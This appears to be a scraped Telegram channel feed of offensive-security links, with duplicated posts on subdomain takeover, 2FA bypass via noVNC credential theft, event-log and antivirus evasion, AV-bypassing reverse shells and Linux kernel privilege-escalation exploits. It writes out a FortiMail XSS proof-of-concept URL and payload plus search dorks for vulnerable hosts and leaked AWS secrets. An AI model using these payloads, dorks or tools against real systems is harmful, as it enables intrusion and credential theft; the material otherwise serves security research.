DNS Abuse & Misconfiguration
The History of DNS Vulnerabilities and the Cloud
https://unit42.paloaltonetworks.com/dns-vulnerabilities/
Dangling Domains: Security Threats, Detection and Prevalence
https://unit42.paloaltonetworks.com/dangling-domains/
Fishing the AWS IP Pool for Dangling Domains
https://bishopfox.com/blog/fishing-the-aws-ip-pool-for-dangling-domains
Respect My Authority – Hijacking Broken Nameservers to Compromise Your Target
https://thehackerblog.com/respect-my-authority-hijacking-broken-nameservers-to-compromise-your-target/
The Orphaned Internet – Taking Over 120K Domains via a DNS Vulnerability in AWS, Google Cloud, Rackspace and Digital Ocean
https://thehackerblog.com/the-orphaned-internet-taking-over-120k-domains-via-a-dns-vulnerability-in-aws-google-cloud-rackspace-and-digital-ocean/
The .io Error – Taking Control of All .io Domains With a Targeted Registration
https://thehackerblog.com/the-io-error-taking-control-of-all-io-domains-with-a-targeted-registration/
The International Incident – Gaining Control of a .int Domain Name With DNS Trickery
https://thehackerblog.com/the-international-incident-gaining-control-of-a-int-domain-name-with-dns-trickery/
Hostile Subdomain Takeover using Heroku/Github/Desk + more
https://labs.detectify.com/2014/10/21/hostile-subdomain-takeover-using-herokugithubdesk-more/
Dangling DNS: Amazon EC2 IPs
https://blog.melbadry9.xyz/dangling-dns/aws/ddns-ec2-current-state
Eliminating Dangling Elastic IP Takeovers with Ghostbuster
https://blog.assetnote.io/2022/02/13/dangling-eips/
Internet-Wide Analysis of Subdomain Takeovers
https://redhuntlabs.com/blog/project-resonance-wave-1.html
Subdomain Takeover
https://0xpatrik.com/subdomain-takeover-basics/
https://0xpatrik.com/subdomain-takeover-candidates/
https://0xpatrik.com/takeover-proofs/
https://0xpatrik.com/subdomain-takeover-ns/
https://0xpatrik.com/subdomain-takeover/
#dns #abuse #aws #elastic #subdomain #takeover
The History of DNS Vulnerabilities and the Cloud
https://unit42.paloaltonetworks.com/dns-vulnerabilities/
Dangling Domains: Security Threats, Detection and Prevalence
https://unit42.paloaltonetworks.com/dangling-domains/
Fishing the AWS IP Pool for Dangling Domains
https://bishopfox.com/blog/fishing-the-aws-ip-pool-for-dangling-domains
Respect My Authority – Hijacking Broken Nameservers to Compromise Your Target
https://thehackerblog.com/respect-my-authority-hijacking-broken-nameservers-to-compromise-your-target/
The Orphaned Internet – Taking Over 120K Domains via a DNS Vulnerability in AWS, Google Cloud, Rackspace and Digital Ocean
https://thehackerblog.com/the-orphaned-internet-taking-over-120k-domains-via-a-dns-vulnerability-in-aws-google-cloud-rackspace-and-digital-ocean/
The .io Error – Taking Control of All .io Domains With a Targeted Registration
https://thehackerblog.com/the-io-error-taking-control-of-all-io-domains-with-a-targeted-registration/
The International Incident – Gaining Control of a .int Domain Name With DNS Trickery
https://thehackerblog.com/the-international-incident-gaining-control-of-a-int-domain-name-with-dns-trickery/
Hostile Subdomain Takeover using Heroku/Github/Desk + more
https://labs.detectify.com/2014/10/21/hostile-subdomain-takeover-using-herokugithubdesk-more/
Dangling DNS: Amazon EC2 IPs
https://blog.melbadry9.xyz/dangling-dns/aws/ddns-ec2-current-state
Eliminating Dangling Elastic IP Takeovers with Ghostbuster
https://blog.assetnote.io/2022/02/13/dangling-eips/
Internet-Wide Analysis of Subdomain Takeovers
https://redhuntlabs.com/blog/project-resonance-wave-1.html
Subdomain Takeover
https://0xpatrik.com/subdomain-takeover-basics/
https://0xpatrik.com/subdomain-takeover-candidates/
https://0xpatrik.com/takeover-proofs/
https://0xpatrik.com/subdomain-takeover-ns/
https://0xpatrik.com/subdomain-takeover/
#dns #abuse #aws #elastic #subdomain #takeover
👍1🔥1
Bypass 2FA Using noVNC
Steal credentials and bypass 2FA by giving users remote access to your server via an HTML5 VNC client that has a browser running in kiosk mode.
https://mrd0x.com/bypass-2fa-using-novnc/
#2fa #bypass #novnc
Steal credentials and bypass 2FA by giving users remote access to your server via an HTML5 VNC client that has a browser running in kiosk mode.
https://mrd0x.com/bypass-2fa-using-novnc/
#2fa #bypass #novnc
Google Groups Dork
Some Devs use "Google Groups" as a workplace because it is easy and free.
But a lot of sensitive information is leaked Such as "access keys", "aws secrets" ...etc .
Dork:
Some Devs use "Google Groups" as a workplace because it is easy and free.
But a lot of sensitive information is leaked Such as "access keys", "aws secrets" ...etc .
Dork:
site:https://groups.google.com "COMPANY"
#osint #dorks #bugbounty👍2
Bloodhound Custom Queries
A combination of custom cypher queries from various sources for BloodHound, added categories to match newest version of BH.
https://github.com/ZephrFish/Bloodhound-CustomQueries
#ad #azure #bloodhound #queries
A combination of custom cypher queries from various sources for BloodHound, added categories to match newest version of BH.
https://github.com/ZephrFish/Bloodhound-CustomQueries
#ad #azure #bloodhound #queries
GitHub
GitHub - ZephrFish/Bloodhound-CustomQueries: Custom Queries - Brought Up to BH4.1 syntax
Custom Queries - Brought Up to BH4.1 syntax. Contribute to ZephrFish/Bloodhound-CustomQueries development by creating an account on GitHub.
This media is not supported in your browser
VIEW IN TELEGRAM
PowerRunAsSystem
Run application as system with interactive system process support (active Windows session). This technique doesn't rely on any external tools and doesn't require a Microsoft Service. It spawns an NT Authority/System process using the Microsoft Windows Task Scheduler then upgrade to Interactive System Process using cool WinApi's (Run in Active Windows Session)
https://github.com/DarkCoderSc/PowerRunAsSystem
#windows #powershell #runas
Run application as system with interactive system process support (active Windows session). This technique doesn't rely on any external tools and doesn't require a Microsoft Service. It spawns an NT Authority/System process using the Microsoft Windows Task Scheduler then upgrade to Interactive System Process using cool WinApi's (Run in Active Windows Session)
https://github.com/DarkCoderSc/PowerRunAsSystem
#windows #powershell #runas
Container Security Checklist
Checklist for container security devsecops practices
https://github.com/krol3/container-security-checklist
#kubernetes #docker #security #cheatsheet #blueteam
Checklist for container security devsecops practices
https://github.com/krol3/container-security-checklist
#kubernetes #docker #security #cheatsheet #blueteam
GitHub
GitHub - krol3/container-security-checklist: Checklist for container security - devsecops practices
Checklist for container security - devsecops practices - krol3/container-security-checklist
Fortinet Fortimail 7.0.1 — Reflected Cross-Site Scripting (CVE-2021-43062)
An improper neutralization of input during web page generation vulnerability in FortiMail may allow an unauthenticated attacker to perform an XSS attack via crafted HTTP GET requests to the FortiGuard URI protection service.
PoC:
Payload:
Dork:
#fortinet #forimail #xss
An improper neutralization of input during web page generation vulnerability in FortiMail may allow an unauthenticated attacker to perform an XSS attack via crafted HTTP GET requests to the FortiGuard URI protection service.
PoC:
https://example/fmlurlsvc/?=&url=https%3A%2F%https://google.com%3CSvg%2Fonload%3Dalert(1)%3E
Payload:
https%3A%2F%https://google.com%3CSvg%2Fonload%3Dalert(1)%3EDork:
inurl:/fmlurlsvc/#fortinet #forimail #xss
KnockOutlook
KnockOutlook is a C# project that interacts with Outlook's COM object in order to perform a number of operations useful in red team engagements.
https://github.com/eksperience/KnockOutlook
#exchange #outlook #com #recon
KnockOutlook is a C# project that interacts with Outlook's COM object in order to perform a number of operations useful in red team engagements.
https://github.com/eksperience/KnockOutlook
#exchange #outlook #com #recon
GitHub
GitHub - eksperience/KnockOutlook: A little tool to play with Outlook
A little tool to play with Outlook. Contribute to eksperience/KnockOutlook development by creating an account on GitHub.
Relaying Kerberos over DNS using krbrelayx and mitm6
New method of gaining RCE on AD hosts in the same VLAN without credentials or needing NTLM, by abusing Kerberos, DNS and Active Directory Certificate Services.
https://dirkjanm.io/relaying-kerberos-over-dns-with-krbrelayx-and-mitm6/
#ad #kerberos #relay #mitm6
New method of gaining RCE on AD hosts in the same VLAN without credentials or needing NTLM, by abusing Kerberos, DNS and Active Directory Certificate Services.
https://dirkjanm.io/relaying-kerberos-over-dns-with-krbrelayx-and-mitm6/
#ad #kerberos #relay #mitm6
dirkjanm.io
Relaying Kerberos over DNS using krbrelayx and mitm6
One thing I love is when I think I understand a topic well, and then someone proves me quite wrong. That was more or less what happened when James Forshaw published a blog on Kerberos relaying, which disproves my conclusion that you can’t relay Kerberos from…
Windows Event Log Evasion via Native APIs
Some native Windows API calls can be used to install services WITHOUT generating correlating entries in the event log. This was seen in Stuxnet.
https://www.inversecos.com/2022/03/windows-event-log-evasion-via-native.html
#edr #event #log #evasion
Some native Windows API calls can be used to install services WITHOUT generating correlating entries in the event log. This was seen in Stuxnet.
https://www.inversecos.com/2022/03/windows-event-log-evasion-via-native.html
#edr #event #log #evasion
Inversecos
Windows Event Log Evasion via Native APIs
ntTraceControl — Powershell Event Tracing Toolbox
Want to simulate any ETW logs using powershell, even the security one?
Do you want to import any evtx files into the current eventlog session?
ntTraceControl is a set of Powershell commands to forge/generate Windows logs. Simply put, ntTraceControl supports Detection teams by simplifying the testing of detection use cases and alerts without using complex infrastructure, tools, or the testing of vulnerabilities.
https://github.com/airbus-cert/ntTraceControl
#etw #simulate #powershell #redteam #blueteam
Want to simulate any ETW logs using powershell, even the security one?
Do you want to import any evtx files into the current eventlog session?
ntTraceControl is a set of Powershell commands to forge/generate Windows logs. Simply put, ntTraceControl supports Detection teams by simplifying the testing of detection use cases and alerts without using complex infrastructure, tools, or the testing of vulnerabilities.
https://github.com/airbus-cert/ntTraceControl
#etw #simulate #powershell #redteam #blueteam
CVE-2022-0995
This is my exploit for CVE-2022-0995, an heap out-of-bounds write in the watch_queue Linux kernel component.
It uses the same technique described in https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html.
The exploit targets Ubuntu 21.10 with kernel 5.13.0-37.
The exploit is not 100% reliable, you may need to run it a couple of times. It may panic the kernel, but during my tests it happened rarely.
https://github.com/Bonfee/CVE-2022-0995
#linux #lpe #exploit #cve
This is my exploit for CVE-2022-0995, an heap out-of-bounds write in the watch_queue Linux kernel component.
It uses the same technique described in https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html.
The exploit targets Ubuntu 21.10 with kernel 5.13.0-37.
The exploit is not 100% reliable, you may need to run it a couple of times. It may panic the kernel, but during my tests it happened rarely.
https://github.com/Bonfee/CVE-2022-0995
#linux #lpe #exploit #cve
👍3
CVE-2022-27666
This is the exploit for CVE-2022-27666, a vulnerability that achieves local privilege escalation on the latest Ubuntu Desktop 21.10.
Research:
https://etenal.me/archives/1825
Exploit:
https://github.com/plummm/CVE-2022-27666
#ubuntu #lpe #linux
This is the exploit for CVE-2022-27666, a vulnerability that achieves local privilege escalation on the latest Ubuntu Desktop 21.10.
Research:
https://etenal.me/archives/1825
Exploit:
https://github.com/plummm/CVE-2022-27666
#ubuntu #lpe #linux
ETenal
CVE-2022-27666: Exploit esp6 modules in Linux kernel - ETenal
This post discloses the exploit of CVE-2022-27666, which achieves local privilege escalation on the latest Ubuntu Desktop 21.10.
🔥2
PSSW100AVB
This is the PSSW100AVB (Powershell Scripts With 100% AV Bypass) Framework.
A list of useful Powershell scripts with 100% AV bypass ratio. (At the time of publication).
Latest Reverse shell tested on Windows 11 (ReverseShell_2022_03.ps1)
https://github.com/tihanyin/PSSW100AVB
#av #evasion #amsi #powershell #ps1
This is the PSSW100AVB (Powershell Scripts With 100% AV Bypass) Framework.
A list of useful Powershell scripts with 100% AV bypass ratio. (At the time of publication).
Latest Reverse shell tested on Windows 11 (ReverseShell_2022_03.ps1)
https://github.com/tihanyin/PSSW100AVB
#av #evasion #amsi #powershell #ps1